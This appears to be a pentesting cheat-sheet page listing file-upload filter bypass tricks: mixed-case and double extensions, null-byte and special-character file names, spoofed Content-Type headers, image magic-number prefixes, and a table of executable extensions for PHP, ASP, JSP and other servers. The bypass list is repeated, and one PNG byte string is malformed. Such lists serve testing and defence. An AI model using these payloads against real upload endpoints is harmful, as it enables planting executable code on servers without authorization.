Filter Bypass

Uppercase letters: .pHp, .pHP5, .PhAr

Double extension:

.png.php
.gif.php

Null byte:

.php%00.gif
.php\x00.gif

Special chars:

file.php%20
file.php%0a
file.php%0d%0a
file.php/
file.php.\
file.php....

Content-Type:

Content-Type : image/gif
Content-Type : image/png
Content-Type : image/jpeg

Magic numbers:

GIF: GIF8;
PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
JPG: \xff\xd8\xff

File Upload

Extensions

PHP

ASP

Jsp

Perl

ColdFusion

NodeJS

.php

.asp

.jsp

.pl

.cfm

.js

.php2

.config

.jspx

.pm

.cfml

.json

.php3

.ashx

.jsw

.cgi

.cfc

.node

.php4

.asmx

.jsv

.lib

.dbm

.php5

.aspq

.jspf

.php7

.axd

.wss

.pht

.cshtm

.do

.phpt

.cshtml

.action

.phtm

.rem

.phtml

.soap

.phps

.vbhtm

.phar

.vbhtm

.hphp

.asa

.module

.cer .shtml

.inc

.shtml

.ctp

Filter Bypass

Uppercase letters: .pHp, .pHP5, .PhAr
Double extension:
- .png.php
- .gif.php
Null byte:
- .php%00.gif
- .php\x00.gif
Special chars:
- file.php%20
- file.php%0a
- file.php%0d%0a
- file.php/
- file.php.\
- file.php....
Content-Type:
- Content-Type : image/gif
- Content-Type : image/png
- Content-Type : image/jpeg
Magic numbers:
- GIF: GIF8;
- PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
- JPG: \xff\xd8\xff

References

Last updated 9 months ago